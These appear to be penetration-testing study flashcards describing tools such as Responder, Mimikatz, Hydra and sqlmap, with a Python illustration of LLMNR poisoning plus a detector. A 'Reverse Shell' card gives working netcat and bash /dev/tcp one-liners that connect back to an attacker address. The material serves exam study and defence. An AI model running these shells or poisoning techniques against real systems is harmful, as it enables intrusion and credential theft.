TOOLS Flashcards
BeEF
Browser Exploitation Framework: hooks a victim's browser with an injected JavaScript payload (typically delivered via XSS) and then drives further client-side attacks from that hook.
Netcat
reads from and writes to raw TCP/UDP connections; used for banner grabbing, port checks, file transfer and bind/reverse shells
Nikto
web application vulnerability scanner (dangerous files/CGIs, outdated server software, server misconfigurations)
Drozer (sometimes written "Androzer" on cards)
security assessment framework for Android apps: interacts with exported activities, services, content providers and broadcast receivers to test for IPC and permission weaknesses
Swagger
API testing
open-source framework (OpenAPI) with a large ecosystem of tools to design, build, document and test REST web services; the Swagger/OpenAPI spec also gives a pentester an inventory of an API's endpoints and parameters
W3AF
open source web application security scanner
Shodan
internet search engine that indexes internet-connected devices by open port and service banner; used for passive reconnaissance without touching the target directly
CeWL
CeWL (Custom Word List generator) is a Ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used as a wordlist for password crackers such as John the Ripper. Optionally, CeWL can follow external links and harvest e-mail addresses.
OpenVAS
open source vulnerability scanner
SET
social engineering toolkit
Responder
Poisons LLMNR / NBT-NS / mDNS traffic.
If a client cannot resolve a name via DNS it falls back to link-local name resolution: LLMNR (introduced in Windows Vista) and NBT-NS (NetBIOS Name Service), and mDNS on newer systems.
Responder listens for these broadcast/multicast queries and answers every one of them with the attacker's IP address. When the victim then tries to authenticate to the "resolved" host (SMB, HTTP, etc.), Responder captures the NTLMv1/v2 challenge-response hashes for offline cracking or relaying. It is a powerful tool whenever a segment still has these fallback protocols enabled.
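The LLMNR exchange Responder abuses, as an added example that is not Responder's own code: LLMNR reuses the DNS wire format (UDP 5355, multicast 224.0.0.252), so a victim's query is a DNS-style question and the poisoned reply is a DNS-style A record pointing at the attacker. The packet bytes are built and parsed by hand; the transaction ID, host name and attacker IP are constructed values. The last function shows the defender's side: a query for a name that does not exist should never get an answer, so any reply to such a honeytoken name indicates a poisoner on the segment.

```python
import socket
import struct

# LLMNR (RFC 4795) constants; only used for documentation here, nothing is sent.
LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
TYPE_A = 1
CLASS_IN = 1


def encode_name(name):
    """'fileserver01' -> b'\\x0cfileserver01\\x00' (DNS label encoding, no compression)."""
    out = b""
    for label in name.split("."):
        if label:
            out += bytes([len(label)]) + label.encode()
    return out + b"\x00"


def decode_name(buf, off):
    """Decode labels starting at buf[off]; return (name, offset after the name)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        labels.append(buf[off:off + n].decode())
        off += n
    return ".".join(labels), off


def build_query(txid, name, qtype=TYPE_A):
    """Victim side: what a Windows host multicasts after DNS fails to resolve `name`."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # flags=0: standard query
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def parse_query(pkt):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "is_query": not flags & 0x8000}


def poison_response(query_pkt, attacker_ip, ttl=30):
    """Attacker side: answer *whatever* was asked with our own address.

    Responder does not care whether the name exists; it echoes the question
    back with the same transaction ID so the victim accepts the answer.
    """
    q = parse_query(query_pkt)
    header = struct.pack("!HHHHHH", q["txid"], 0x8000, 1, 1, 0, 0)  # QR=1, one answer
    question = encode_name(q["name"]) + struct.pack("!HH", q["qtype"], q["qclass"])
    answer = (encode_name(q["name"])
              + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4)
              + socket.inet_aton(attacker_ip))
    return header + question + answer


def parse_response(pkt):
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    _, off = decode_name(pkt, off)      # skip echoed question name
    off += 4                            # skip QTYPE/QCLASS
    name, off = decode_name(pkt, off)
    atype, aclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    return {"txid": txid, "is_response": bool(flags & 0x8000), "name": name,
            "ip": socket.inet_ntoa(pkt[off:off + rdlen]), "ttl": ttl}


def honeytoken_alert(response_pkt, honeytoken_name):
    """Defender side: a reply for a deliberately bogus name means someone is poisoning."""
    r = parse_response(response_pkt)
    if r["is_response"] and r["name"].lower() == honeytoken_name.lower():
        return "LLMNR poisoner at %s answered for bogus host %s" % (r["ip"], r["name"])
    return None


if __name__ == "__main__":
    q = build_query(0x1234, "fileserver01")           # constructed victim query
    r = poison_response(q, "10.0.0.66")               # constructed attacker address
    print(parse_response(r))
    print(honeytoken_alert(r, "fileserver01"))
```

The detection idea mirrors what Responder's own analyze mode and standalone poisoner-detectors do: periodically query for a name you know does not exist and alert on any answer. The durable fix is to disable LLMNR and NBT-NS via Group Policy and enforce SMB signing so captured hashes cannot simply be relayed.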
Mimikatz
a popular post-exploitation tool that dumps passwords, hashes, PINs, and Kerberos tickets from memory.
It also performs pass-the-hash and pass-the-ticket, and can forge Kerberos Golden Tickets (from the krbtgt hash) and Silver Tickets (from a service account hash).
NCRACK
Ncrack is a very fast ONLINE password brute-force tool from the Nmap team.
It supports a limited set of network protocols, including: • FTP • Telnet • SSH • RDP • VNC • HTTP(S) (basic authentication) • SMB • POP3 • MySQL/PostgreSQL and a few others. Being online, it is rate-limited by the target and noisy in logs.
Hydra
Hydra (THC-Hydra) is an online brute-forcing / password-guessing tool that supports a very wide range of protocols (SSH, FTP, Telnet, SMB, RDP, HTTP forms and basic auth, SMTP, POP3, IMAP, databases, and more).
Maltego
OSINT
visualization of data relationships gathered from OSINT efforts.
Mimikatz (continued)
reads the LSASS (Local Security Authority Subsystem Service) process memory and extracts cached credentials: NTLM hashes, Kerberos tickets and, where WDigest is enabled, clear-text passwords (no cracking needed).
Kerberos Golden Ticket: a forged TGT signed with the krbtgt account's hash, giving domain-wide access until krbtgt is rotated (twice).
Credential testing tools
Hashcat, Medusa, Hydra, CeWL, John the Ripper, Cain and Abel, Mimikatz, Patator, Dirbuster, W3AF
theHarvester
OSINT
gathers e-mail addresses, subdomains, hosts, employee names, open ports and banners from public sources (search engines, PGP key servers, Shodan)
Empire
PowerShell-based post-exploitation and command-and-control (C2) framework; agents run in memory without touching powershell.exe on disk
Findbugs / Spotbugs
a static code analyzer for Java that inspects compiled bytecode for bug patterns; SpotBugs is the maintained successor to FindBugs
tcpdump
a command-line packet sniffer that captures and decodes network traffic (pcap output can be opened later in Wireshark)
Reaver
brute-forces the WPS PIN of a WPS-enabled Wi-Fi router; once the PIN is recovered the router hands over the WPA/WPA2 passphrase
Sqlmap
automated SQL injection detection and exploitation tool; once an injection point is found it can enumerate and dump databases, read files and, on some back ends, gain OS command execution
Hashcat
offline password cracking / recovery tool, one of the fastest because it uses the GPU as well as the classic CPU; supports hundreds of hash formats and attack modes (dictionary, rules, mask, combinator)
Reverse Shell
Netcat
Attack box (listener):   nc -lvp 4444
Target host (connect back, shell attached to the socket):   nc 192.168.100.113 4444 -e /bin/bash
Note: -e exists in the traditional netcat and in Nmap's ncat, but not in the OpenBSD netcat shipped by many distributions; that is why the Bash one-liner below is often used instead.
Bash
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
(interactive bash with stdout and stderr redirected to the TCP connection and stdin read from it; /dev/tcp is a bash built-in pseudo-device, not a real file, so this needs bash rather than sh)
IDA
Interactive DisAssembler and debugger
generates assembly language source code from machine-executable code. It supports a variety of executable formats for different processors and operating systems. It can also be used as a debugger for Windows PE, macOS Mach-O, and Linux ELF executables. The Hex-Rays decompiler plug-in, which produces C-like pseudocode from compiled C/C++ binaries, is available at extra cost.
Software Assurance
FindBugs - static analysis / security audit of Java bytecode (succeeded by SpotBugs)
Peach - fuzzing framework (dynamic analysis): generates malformed inputs from a data model and watches the target for crashes
AFL - American Fuzzy Lop: coverage-guided fuzzer that mutates inputs and keeps those that reach new code paths
SonarQube - static code analysis platform covering many languages (code quality plus security rules)
YASCA - Yet Another Source Code Analyzer: open-source static code scanner that wraps other analyzers through plugins (static analysis, not fuzzing)
theHarvester
OSINT tool to collect e-mail addresses, names and subdomains for a target domain
Vulnerability Scanners
Nikto, OpenVAS, Nessus, sqlmap, W3AF, nmap (with NSE scripts), Metasploit (auxiliary scanner modules)